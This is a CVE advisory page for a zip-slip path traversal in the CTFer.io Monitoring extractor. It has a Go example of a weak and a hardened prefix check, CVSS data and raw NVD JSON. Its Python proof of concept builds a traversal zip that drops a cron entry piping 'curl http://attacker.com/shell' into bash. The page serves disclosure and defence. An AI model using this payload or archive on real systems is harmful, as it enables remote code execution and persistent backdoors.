Security Vulnerability Report
CVE-2026-32771 CVSS 9.8 CRITICAL

CVE-2026-32771

Published: 2026-03-20 01:15:56
Last Modified: 2026-04-16 13:28:35

Description

The CTFer.io Monitoring component is in charge of the collection, processing and storage of various signals (i.e. logs, metrics and distributed traces). In versions prior to 0.2.2, the sanitizeArchivePath function in pkg/extract/extract.go (lines 248–254) is vulnerable to Path Traversal due to a missing trailing path separator in the strings.HasPrefix check. The extractor allows arbitrary file writes (e.g., overwriting shell configs, SSH keys, kubeconfig, or crontabs), enabling RCE and persistent backdoors. The attack surface is further amplified by the default ReadWriteMany PVC access mode, which lets any pod in the cluster inject a malicious payload. This issue has been fixed in version 0.2.2.
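
The prefix-check flaw described above, shown next to one way to harden it. This is an added example, not the project's sanitizeArchivePath or its patch; the function names weakInside and strictInside, the root /data/extract and the entry names are constructed for illustration.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// weakInside reproduces the flawed pattern: a bare prefix test on the joined
// path. Illustrative only, not the project's sanitizeArchivePath.
func weakInside(root, entry string) bool {
	target := filepath.Join(root, entry) // Join also cleans ".." segments
	return strings.HasPrefix(target, filepath.Clean(root))
}

// strictInside accepts the root itself or paths below root + separator, so a
// sibling directory that merely shares the root's name as a prefix is rejected.
func strictInside(root, entry string) bool {
	root = filepath.Clean(root)
	target := filepath.Join(root, entry)
	return target == root ||
		strings.HasPrefix(target, root+string(filepath.Separator))
}

func main() {
	root := "/data/extract" // constructed extraction root
	entries := []string{ // constructed archive entry names
		"logs/app.log",
		"../../etc/hosts",
		"../extract-old/notes.txt",
	}
	for _, e := range entries {
		fmt.Printf("%-26s -> %-28s weak=%-5t strict=%t\n",
			e, filepath.Join(root, e), weakInside(root, e), strictInside(root, e))
	}
}
```

Both checks are lexical only; archive entries that are symbolic links need separate handling before any write.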

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ctfer:monitoring:*:*:*:*:*:go:*:* - VULNERABLE
CTFer.io Monitoring < 0.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile
import os


def create_malicious_zip():
    # Payload content to be written (e.g., a cron job for reverse shell)
    # This payload attempts to add a cron job for persistent access
    payload_content = b"*/1 * * * * /bin/bash -c 'curl http://attacker.com/shell | bash'\n"

    # The vulnerability allows path traversal because the check lacks a trailing separator.
    # If the extraction root is /data/extract, a filename like
    # /data/extract/../../tmp/cron_pwn passes the HasPrefix check
    # if the code only checks for "/data/extract" without a trailing slash.
    zip_filename = "exploit.zip"

    with zipfile.ZipFile(zip_filename, 'w') as zf:
        # Use an absolute path or traversal sequence relative to extraction dir
        # Assuming the vulnerable code handles the prefix check incorrectly
        zinfo = zipfile.ZipInfo("../../../../tmp/cron_pwn")
        zinfo.external_attr = 0o644 << 16  # Unix permissions
        zf.writestr(zinfo, payload_content)

    print(f"[+] Created malicious zip file: {zip_filename}")
    print(f"[+] Payload written to: ../../../../tmp/cron_pwn")


if __name__ == "__main__":
    create_malicious_zip()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32771", "sourceIdentifier": "[email protected]", "published": "2026-03-20T01:15:55.940", "lastModified": "2026-04-16T13:28:34.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CTFer.io Monitoring component is in charge of the collection, process and storage of various signals (i.e. logs, metrics and distributed traces). In versions prior to 0.2.2, the sanitizeArchivePath function in pkg/extract/extract.go (lines 248–254) is vulnerable to Path Traversal due to a missing trailing path separator in the strings.HasPrefix check. The extractor allows arbitrary file writes (e.g., overwriting shell configs, SSH keys, kubeconfig, or crontabs), enabling RCE and persistent backdoors. The attack surface is further amplified by the default ReadWriteMany PVC access mode, which lets any pod in the cluster inject a malicious payload. This issue has been fixed in version 0.2.2."}, {"lang": "es", "value": "El componente de monitoreo de CTFer.io se encarga de la recolección, procesamiento y almacenamiento de varias señales (es decir, registros, métricas y trazas distribuidas). En versiones anteriores a la 0.2.2, la función sanitizeArchivePath en pkg/extract/extract.go (líneas 248–254) es vulnerable a salto de ruta debido a la falta de un separador de ruta final en la verificación strings.HasPrefix. El extractor permite escrituras de archivos arbitrarias (por ejemplo, sobrescribir configuraciones de shell, claves SSH, kubeconfig o crontabs), lo que permite RCE y puertas traseras persistentes. La superficie de ataque se amplifica aún más por el modo de acceso predeterminado ReadWriteMany de PVC, que permite a cualquier pod en el clúster inyectar una carga útil maliciosa. 
Este problema ha sido solucionado en la versión 0.2.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ctfer:monitoring:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.2.2", "matchCriteriaId": "69EE5432-4A5D-4B8F-8D6F-9A5111DFD7B8"}]}]}], "references": [{"url": "https://github.com/ctfer-io/monitoring/commit/269dba165aa42210352628c0db6756f3b8fd3c8a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ctfer-io/monitoring/security/advisories/GHSA-f7cq-gvh6-qr25", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://security.snyk.io/research/zip-slip-vulnerability#expandable-socPI9fFAJ-title", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}